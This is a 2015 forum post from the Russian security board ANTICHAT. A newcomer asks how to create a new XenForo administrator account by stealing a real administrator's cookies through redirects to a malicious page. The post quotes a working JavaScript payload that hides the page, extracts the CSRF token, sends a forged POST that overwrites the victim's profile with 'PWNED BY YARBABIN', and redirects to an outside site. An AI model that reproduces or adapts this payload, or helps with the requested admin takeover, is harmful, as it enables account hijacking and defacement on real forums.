HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Как это решить?
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 17.07.2015, 12:20
Lonely Man
Новичок
Регистрация: 17.07.2015
Сообщений: 2
Провел на форуме:
362

Репутация: 0
По умолчанию
Доброе время суток. В поисках ответа на свой порос я пришел к Вам, так-как тут говорят что есть знающие люди. Суть вопроса такова: как создать новую учетную запись администратора на XenForo через подмену куки реального администратора методом редиректов на страницу с вредоносным кодом?

Вдохновился статьей одного из модераторов yarbabin где он показывал как обычным редиректом на страницу с вредоносным кодом можно было изменять подписи.

Код HTML:
$(document).ready(function pwn() { 
$(document.body).hide(); 
$('html').css('background-color','#fff'); 
var getcsrf = document.body.innerHTML;
var re = new RegExp('_csrfToken: "(.*)"', 'ig');
token = re.exec(getcsrf)[1];
var xhr = new XMLHttpRequest();
var body = 'about_html=%3Cp%3EPWNED+BY+%3Ca+href%3D%22https%3A%2F%2Fbhf.su%2Fmembers%2F71790%2F%22+class%3D%22internalLink+ProxyLink%22+data-proxy-href%3D%22https%3A%2F%2Fbhf.su%2Fmembers%2F71790%2F%22%3EYARBABIN%3C%2Fa%3E%3C%2Fp%3E%0D%0A&_xfRelativeResolver=https%3A%2F%2Fbhf.su%2Faccount%2Fpersonal-details&save=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C+%D0%B8%D0%B7%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F&_xfRequestUri=%2Faccount%2Fpersonal-details&_xfNoRedirect=1&_xfToken=' + encodeURIComponent(token) + '&_xfResponseType=json';
xhr.open("POST", '/account/personal-details-save', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send(body);
document.location.href='https://yarbabin.ru/dorkgen/dorkgen.php';
});
Есть-ли люди знающие как реализовать данную затею?
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.